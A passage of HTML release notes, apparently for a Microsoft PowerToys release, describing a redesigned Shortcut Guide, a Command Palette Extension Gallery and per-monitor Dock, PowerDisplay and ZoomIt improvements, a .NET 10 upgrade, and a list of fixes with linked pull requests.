<p>The new Shortcut Guide has been designed and built from the ground up. The new experience appears as a <strong>pane on the side of your screen and automatically detects the active application when invoked, showing the shortcuts that are relevant to what you're currently doing</strong>. In addition to app-specific shortcuts, Shortcut Guide also includes a <strong>wide range of Windows shortcuts and shortcuts from enabled PowerToys utilities</strong>. Want to see if your favorite app is supported? <a href="https://learn.microsoft.com/windows/powertoys/shortcut-guide" rel="nofollow">Check out the documentation</a> for the current list of supported applications. If you'd like to add support for another app, we'd love your help! Feel free to open a pull request, or create an issue with a link to the app's shortcut documentation.</p>
<a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/9866362/604705766-c315f908-1624-41f0-a19d-218b4e08d987.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNTc2Ni1jMzE1ZjkwOC0xNjI0LTQxZjAtYTE5ZC0yMThiNGUwOGQ5ODcucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9YWE4YTJjNDUwZWNlZWIwZDJmNjg5NjVmNTBkMzQ1MGU4MjM2OWI5ZTc1MWMyMGJjZjNhOWFmZWE0NzM3MjRmNCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.QSI1ZqHzJledPdz1VKWB3wwvK7XF3eNewCyNeEevqS8"><img width="680" height="493" alt="shortcutguide" src="https://private-user-images.githubusercontent.com/9866362/604705766-c315f908-1624-41f0-a19d-218b4e08d987.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNTc2Ni1jMzE1ZjkwOC0xNjI0LTQxZjAtYTE5ZC0yMThiNGUwOGQ5ODcucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9YWE4YTJjNDUwZWNlZWIwZDJmNjg5NjVmNTBkMzQ1MGU4MjM2OWI5ZTc1MWMyMGJjZjNhOWFmZWE0NzM3MjRmNCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.QSI1ZqHzJledPdz1VKWB3wwvK7XF3eNewCyNeEevqS8" content-type-secured-asset="image/png"></a>
<p>Big thanks to <a href="https://github.com/noraa-junker">@noraa-junker</a> all the great work on this new utility!</p>
<p><a href="https://github.com/microsoft/PowerToys/pull/40834" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/40834/hovercard">#40834</a> by <a href="https://github.com/noraa-junker">@noraa-junker</a>, <a href="https://github.com/microsoft/PowerToys/pull/48037" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48037/hovercard">#40834</a> by <a href="https://github.com/noraa-junker">@noraa-junker</a></p>
<br>
<hr>
<h2>⚡ Command Palette: new Extension Gallery, and multi-monitor Dock (and more!)</h2>
<p>Command Palette was built with extensibility in mind. Developers can create their own extensions, distribute them through the Microsoft Store or WinGet, and build powerful experiences that help users get things done faster. One piece of feedback we've heard consistently is that discovering and installing extensions wasn't always easy. <strong>That's why we're introducing the Extension Gallery</strong>. Available directly from Command Palette Settings, the Extension Gallery makes it easy to b<strong>rowse, discover, install, update, and remove extensions without leaving Command Palette</strong>. Whether you're looking for new capabilities or managing existing extensions, everything is now just a few clicks away.</p>
<a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/9866362/604707247-2edcb1aa-adab-4a1f-9ecd-30ffd5ac2514.gif?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNzI0Ny0yZWRjYjFhYS1hZGFiLTRhMWYtOWVjZC0zMGZmZDVhYzI1MTQuZ2lmP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NzgzMTcyYjU1YzYyN2RjM2FlZTA2OWQ2OWJlZGU2ODNjYjdjY2I2NDU2NWVhODMyNjY1ZWQyNjgwMWE5YTQ0ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGZ2lmIn0.E7fKOfFniYDHGgkRmO-sAshkN0x2XtYJnpIAm6LFPe4"><img width="680" height="503" alt="ExtensionGallery" src="https://private-user-images.githubusercontent.com/9866362/604707247-2edcb1aa-adab-4a1f-9ecd-30ffd5ac2514.gif?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNzI0Ny0yZWRjYjFhYS1hZGFiLTRhMWYtOWVjZC0zMGZmZDVhYzI1MTQuZ2lmP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NzgzMTcyYjU1YzYyN2RjM2FlZTA2OWQ2OWJlZGU2ODNjYjdjY2I2NDU2NWVhODMyNjY1ZWQyNjgwMWE5YTQ0ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGZ2lmIn0.E7fKOfFniYDHGgkRmO-sAshkN0x2XtYJnpIAm6LFPe4" content-type-secured-asset="image/gif"></a>
<p><a href="https://github.com/microsoft/PowerToys/pull/46636" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46636/hovercard">#46636</a> by <a href="https://github.com/jiripolasek">@jiripolasek</a></p>
<p>The Dock has also <strong>received a major upgrade with multi-monitor support</strong>. <strong>Each monitor can now have its own independent Dock configuration</strong>, making it easy to tailor your setup for every display in your workspace. You can choose which monitors should display a Dock directly from Command Palette Settings, and the improved Pin to Dock experience now lets you choose exactly where a command should be pinned. Whether you want different tools on different screens or dedicated docks for specific workflows, configuring your setup is now more flexible than ever.</p>
<p>On top of that, the <strong>Performance Monitor extension has gained a new Battery widget</strong>, showing charge level, charging status, and estimated time remaining. We've also added support for pinning individual metrics such as CPU, Memory, GPU, Network, and Battery directly to the Dock.</p>
<a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/9866362/604707802-6959b01f-4839-4a75-b9be-8d55c28c6840.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNzgwMi02OTU5YjAxZi00ODM5LTRhNzUtYjliZS04ZDU1YzI4YzY4NDAucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9N2QwMmI5MGIxZmI5YWYwZDdlODMyNTY0MWMzNDMwNjk1NjA4ODg0MDllN2RiMGIxMWU0YWRkZjA5ZWQ5M2M4ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.cgWyA_sC8Wnl_fXs_E5rmXotLXbbc3jzFyBaSEXsIcY"><img width="680" height="423" alt="Dock" src="https://private-user-images.githubusercontent.com/9866362/604707802-6959b01f-4839-4a75-b9be-8d55c28c6840.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwNzgwMi02OTU5YjAxZi00ODM5LTRhNzUtYjliZS04ZDU1YzI4YzY4NDAucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9N2QwMmI5MGIxZmI5YWYwZDdlODMyNTY0MWMzNDMwNjk1NjA4ODg0MDllN2RiMGIxMWU0YWRkZjA5ZWQ5M2M4ZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.cgWyA_sC8Wnl_fXs_E5rmXotLXbbc3jzFyBaSEXsIcY" content-type-secured-asset="image/png"></a>
<p><a href="https://github.com/microsoft/PowerToys/pull/47870" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47870/hovercard">#47870</a> by <a href="https://github.com/Knyrps">@Knyrps</a></p>
<p>Beyond these features, we've shipped <strong>dozens of fixes and improvements across Command Palette</strong>, including better search experiences, reliability improvements, accessibility enhancements, performance optimizations, and extension platform updates.</p>
<p>A huge thanks to <a href="https://github.com/jiripolasek">@jiripolasek</a> for the sustained Command Palette work across this release!</p>
<br>
<hr>
<h2>🖥️ PowerDisplay improvements</h2>
<p>This release focuses heavily on <strong>reliability, compatibility, and monitor detection improvements</strong>. Startup is now significantly faster on many systems, monitor identification is more reliable across reboots, and monitor settings are preserved more consistently. We've also introduced a new Max Compatibility Mode for displays that don't properly advertise DDC capabilities, helping Power Display work with a wider range of monitors. Several usability improvements have landed as well. The flyout can now be dismissed using Escape, sliders support mouse wheel adjustment, and displays are automatically rescanned when your PC wakes from sleep.</p>
<br>
<hr>
<h2>🔍 ZoomIt: webcam capture and recording improvements</h2>
<p>This release <strong>adds support for a webcam overlay while recording</strong>, making it easier to create demos, presentations, and tutorials. We've also added support for <strong>appending multiple clips with transitions</strong>, allowing you to stitch recordings together without leaving ZoomIt.</p>
<a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/9866362/604708237-dc25780b-46a6-4637-a1b1-e6e21fd0840a.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwODIzNy1kYzI1NzgwYi00NmE2LTQ2MzctYTFiMS1lNmUyMWZkMDg0MGEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NjdlNzE2OWQwNjJhZDhiN2U1OWM0ODVlNzc2NjkxZTA0YzI0NzY3M2VmMDMzMzkzOTZkNTViOGYxOTU4NzBkZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.n-wdqMQNdmsDXRHkYEoVFc-AdozrKxQczAp-pJxKUMg"><img width="680" height="286" alt="ZoomIt" src="https://private-user-images.githubusercontent.com/9866362/604708237-dc25780b-46a6-4637-a1b1-e6e21fd0840a.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODEwNjYyMDUsIm5iZiI6MTc4MTA2NTkwNSwicGF0aCI6Ii85ODY2MzYyLzYwNDcwODIzNy1kYzI1NzgwYi00NmE2LTQ2MzctYTFiMS1lNmUyMWZkMDg0MGEucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI2MDYxMCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNjA2MTBUMDQzMTQ1WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9NjdlNzE2OWQwNjJhZDhiN2U1OWM0ODVlNzc2NjkxZTA0YzI0NzY3M2VmMDMzMzkzOTZkNTViOGYxOTU4NzBkZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmcmVzcG9uc2UtY29udGVudC10eXBlPWltYWdlJTJGcG5nIn0.n-wdqMQNdmsDXRHkYEoVFc-AdozrKxQczAp-pJxKUMg" content-type-secured-asset="image/png"></a>
<br>
<hr>
<h3>🔄 Foundations and platform improvements</h3>
<p>This release, we have also focused on making the PowerToys foundations better: <strong>we've upgraded the project to .NET 10</strong>, helping us stay current with the latest platform improvements and tooling and making the overall experience faster! We've also reduced the installer footprint (by 15%), making downloads smaller and installations more efficient.</p>
<p>Big thanks to <a href="https://github.com/snickler">@snickler</a> for driving the .NET 10 upgrade!</p>
<p><strong>Auto-update has also become more reliable</strong>. PowerToys now properly relaunches after updating, provides clearer success notifications, and automatically backs up configuration files before updates so settings can be restored if corruption is detected.</p>
<p>As part of our ongoing modernization efforts, <strong>both Quick Accent and Workspaces have moved away from custom WPF theming libraries and now use native Fluent-inspired WPF styling</strong>. This helps them better align with the overall PowerToys experience and modern Windows design language. <strong>Workspaces in particular received a significant UX refresh</strong>, with updated typography, spacing, layout improvements, and a cleaner overall experience.</p>
<br>
<hr>
<h3>🧩 Other notable changes</h3>
<ul>
<li><strong>Keyboard Manager</strong>: The new WinUI 3 editor is now enabled by default.</li>
<li><strong>Mouse Without Borders</strong>: Added a new Refresh Connections action to quickly reconnect devices.</li>
<li><strong>Image Resizer</strong>: Changes to settings can now be picked up automatically without restarting the experience.</li>
<li><strong>Quick Accent</strong>: Improved reliability on high-DPI and multi-monitor setups, along with support for Greek Polytonic characters.</li>
<li><strong>Peek</strong>: Added an option to disable file preview tooltips.</li>
<li><strong>PowerToys Run</strong>: Improved calculator handling for complex-number scenarios and documented a new community Disk Analyzer plugin.</li>
</ul>
<hr>
<h2>Full release notes</h2>
<h3>Advanced Paste</h3>
<ul>
<li>Fixed Advanced Paste clipboard-to-JSON conversion so clipboard read failures return an empty result instead of surfacing an exception in <a href="https://github.com/microsoft/PowerToys/pull/48124" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48124/hovercard">#48124</a></li>
</ul>
<h3>Command Palette</h3>
<h4>Extension Gallery &amp; Extensions</h4>
<ul>
<li>
<p>Added the Command Palette Extension Gallery so users can discover, browse, install, update, and uninstall community extensions from within Command Palette, with cached gallery data, extension details/screenshots, and WinGet status/progress integration in <a href="https://github.com/microsoft/PowerToys/pull/46636" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46636/hovercard">#46636</a> by <a href="https://github.com/jiripolasek">@jiripolasek</a></p>
</li>
<li>
<p>Added Command Palette parameter pages so extensions can prompt for lightweight command inputs directly in the search experience, including sample pages and SDK support for parameter runs in <a href="https://github.com/microsoft/PowerToys/pull/47826" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47826/hovercard">#47826</a></p>
</li>
<li>
<p>Updated Command Palette bookmarks to collect placeholder values as inline parameters, so bookmarked commands can be filled in directly instead of opening a separate placeholders page in <a href="https://github.com/microsoft/PowerToys/pull/47886" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47886/hovercard">#47886</a></p>
</li>
<li>
<p>Improved Command Palette Extension Gallery link handling so only HTTP/HTTPS homepage, author, install, and metadata links are shown or opened from the gallery UI in <a href="https://github.com/microsoft/PowerToys/pull/47898" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47898/hovercard">#47898</a> by <a href="https://github.com/jiripolasek">@jiripolasek</a></p>
</li>
<li>
<p>Fixed Command Palette Extension Gallery UI bindings so WinGet operation indicators continue to update correctly without build warnings in <a href="https://github.com/microsoft/PowerToys/pull/47899" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47899/hovercard">#47899</a> by <a href="https://github.com/jiripolasek">@jiripolasek</a></p>
</li>
<li>
<p>Fixed an AOT-only Command Palette Extension Gallery crash when opening an extension page with screenshots in <a href="https://github.com/microsoft/PowerToys/pull/48065" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48065/hovercard">#48065</a></p>
</li>
<li>
<p>Updated the Command Palette extension template to use the 0.11 SDK package in <a href="https://github.com/microsoft/PowerToys/pull/48066" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48066/hovercard">#48066</a></p>
</li>
<li>
<p>Improved Command Palette accessibility so Narrator announces checkbox labels on the Installed Apps page in Extensions settings in <a href="https://github.com/microsoft/PowerToys/pull/48135" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48135/hovercard">#48135</a> by <a href="https://github.com/chatasweetie">@chatasweetie</a></p>
</li>
</ul>
<h4>Dock</h4>
<ul>
<li>
<p>Added Command Palette Dock support for customizing dock bands separately per monitor, allowing multi-monitor setups to keep independent dock layouts in <a href="https://github.com/microsoft/PowerToys/pull/46915" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/46915/hovercard">#46915</a></p>
</li>
<li>
<p>Added Command Palette Dock edit mode support for dragging dock bands between monitors, so pinned commands can move across per-monitor dock layouts in <a href="https://github.com/microsoft/PowerToys/pull/47921" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47921/hovercard">#47921</a></p>
</li>
<li>
<p>Added Command Palette Dock drag-and-drop bookmarking for files and URLs, immediately creating and pinning bookmarks, improving pinned folder bookmarks so they open the Command Palette browse experience in <a href="https://github.com/microsoft/PowerToys/pull/47989" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47989/hovercard">#47989</a></p>
</li>
<li>
<p>Fixed Command Palette dock context menu commands so Page commands and confirmation dialogs open the palette at the dock item when invoked from a dock item menu in <a href="https://github.com/microsoft/PowerToys/pull/47991" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47991/hovercard">#47991</a></p>
</li>
<li>
<p>Fixed Command Palette Dock band tooltips so they refresh when the item title or subtitle changes in <a href="https://github.com/microsoft/PowerToys/pull/47557" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47557/hovercard">#47557</a></p>
</li>
<li>
<p>Fixed Command Palette dock startup animations so items pinned to the End section animate consistently with Start and Center items in <a href="https://github.com/microsoft/PowerToys/pull/48099" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48099/hovercard">#48099</a></p>
</li>
<li>
<p>Fixed Command Palette dock subtitle visibility in compact mode so subtitles refresh correctly after async updates in <a href="https://github.com/microsoft/PowerToys/pull/48088" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48088/hovercard">#48088</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Fixed Command Palette hotkey navigation when the palette is showing a transient dock page in <a href="https://github.com/microsoft/PowerToys/pull/48089" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48089/hovercard">#48089</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Fixed a Command Palette dock window border that occasionally remained visible after disconnect/reconnect, by ensuring the owner HWND is set before frame removal in <a href="https://github.com/microsoft/PowerToys/pull/48180" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48180/hovercard">#48180</a></p>
</li>
<li>
<p>Improved the Command Palette Pin to Dock dialog by reordering controls so they appear above the preview, making the dialog easier to scan in <a href="https://github.com/microsoft/PowerToys/pull/48250" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48250/hovercard">#48250</a></p>
</li>
</ul>
<h4>Performance Monitor</h4>
<ul>
<li>
<p>Added a Battery widget to Command Palette Performance Monitor that shows live charge percentage, charging/AC status, and estimated time remaining, updating the dock-band battery icon to reflect current charge level and charging state in <a href="https://github.com/microsoft/PowerToys/pull/47870" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47870/hovercard">#47870</a> by <a href="https://github.com/Knyrps">@Knyrps</a></p>
</li>
<li>
<p>Added Command Palette Performance Monitor dock bands for individual metrics like CPU, memory, network, GPU, and battery when available in <a href="https://github.com/microsoft/PowerToys/pull/47967" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47967/hovercard">#47967</a></p>
</li>
<li>
<p>Fixed Command Palette Performance Monitor's CPU dock reading to use a 0–100% system CPU counter, preventing boosted CPUs from showing values above 100% in <a href="https://github.com/microsoft/PowerToys/pull/47864" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47864/hovercard">#47864</a> by <a href="https://github.com/Knyrps">@Knyrps</a></p>
</li>
<li>
<p>Improved Command Palette Performance Monitor network widgets by giving Send and Receive distinct up/down arrow icons and simplifying their labels in <a href="https://github.com/microsoft/PowerToys/pull/48118" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48118/hovercard">#48118</a></p>
</li>
<li>
<p>Reordered Command Palette Performance Monitor network dock bands to match Task Manager's send/receive order in <a href="https://github.com/microsoft/PowerToys/pull/48098" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48098/hovercard">#48098</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Fixed a Command Palette Performance Monitor crash when a GPU index falls outside the available range in <a href="https://github.com/microsoft/PowerToys/pull/48103" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48103/hovercard">#48103</a> by <a href="https://github.com/michaeljolley">@michaeljolley</a></p>
</li>
<li>
<p>Fixed a Command Palette Performance Monitor settings file path collision that could cause widget settings to overwrite one another in <a href="https://github.com/microsoft/PowerToys/pull/48251" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48251/hovercard">#48251</a> by <a href="https://github.com/namdpran8">@namdpran8</a></p>
</li>
</ul>
<h4>Calculator</h4>
<ul>
<li>Added <code>rand()</code> and <code>randi()</code> to the Command Palette Calculator and improved error messages by distinguishing invalid expressions, NaN, and out-of-range results in <a href="https://github.com/microsoft/PowerToys/pull/47725" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47725/hovercard">#47725</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
<li>Fixed Command Palette Calculator parsing for multi-argument functions in cultures where comma is both thousands separator and argument separator, so expressions like <code>max(1,2)</code> and grouped numbers are handled correctly in <a href="https://github.com/microsoft/PowerToys/pull/47731" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47731/hovercard">#47731</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
<li>Fixed the Command Palette and Run Calculator 'log' and 'ln' functions when whitespace separates the function name from its argument, so 'log (n)' computes log base 10 and 'ln (n)' no longer errors out in <a href="https://github.com/microsoft/PowerToys/pull/47767" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47767/hovercard">#47767</a> by <a href="https://github.com/daverayment">@daverayment</a></li>
</ul>
<h4>Reliability &amp; UX</h4>
<ul>
<li>
<p>Added a pinned commands section to the Command Palette Home page with context-menu actions for reordering pinned commands in <a href="https://github.com/microsoft/PowerToys/pull/45869" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/45869/hovercard">#45869</a> by <a href="https://github.com/jiripolasek">@jiripolasek</a></p>
</li>
<li>
<p>Updated Command Palette Shell provider to behave more like Windows Run, improving command execution and suggestions for network paths, NTFS paths, and other edge-case paths in <a href="https://github.com/microsoft/PowerToys/pull/47642" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47642/hovercard">#47642</a></p>
</li>
<li>
<p>Improved Command Palette Window Walker by showing a loading state while open windows are queried during search in <a href="https://github.com/microsoft/PowerToys/pull/47919" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47919/hovercard">#47919</a></p>
</li>
<li>
<p>Improved Command Palette list items by limiting visible tag pills to three and showing a +N overflow badge, preventing tags from crowding out titles in <a href="https://github.com/microsoft/PowerToys/pull/47140" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47140/hovercard">#47140</a></p>
</li>
<li>
<p>Added a Command Palette All Apps setting to hide app description subtitles in search results for a cleaner list view in <a href="https://github.com/microsoft/PowerToys/pull/47128" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47128/hovercard">#47128</a></p>
</li>
<li>
<p>Fixed Command Palette back navigation so the bottom command bar refreshes immediately when returning with Esc or Backspace in <a href="https://github.com/microsoft/PowerToys/pull/47126" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47126/hovercard">#47126</a></p>
</li>
<li>
<p>Fixed Command Palette Extensions settings text so single command and fallback command counts use singular wording in <a href="https://github.com/microsoft/PowerToys/pull/47125" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47125/hovercard">#47125</a></p>
</li>
<li>
<p>Improved Command Palette extension logging by routing extension messages to info, warning, or error logs according to their reported severity in <a href="https://github.com/microsoft/PowerToys/pull/47896" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47896/hovercard">#47896</a></p>
</li>
<li>
<p>Updated Command Palette versioning to 0.11 in <a href="https://github.com/microsoft/PowerToys/pull/47841" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/47841/hovercard">#47841</a></p>
</li>
<li>
<p>Added stable Command Palette automation IDs so UI testing tools can reliably target controls and generated list items across sessions in <a href="https://github.com/microsoft/PowerToys/pull/48033" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48033/hovercard">#48033</a></p>
</li>
<li>
<p>Fixed Command Palette Dock positioning when opening palette items from secondary displays, so the palette appears on the correct monitor in <a href="https://github.com/microsoft/PowerToys/pull/48061" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/PowerToys/pull/48061/hovercard">#48061</a></p>
</li>
<li>
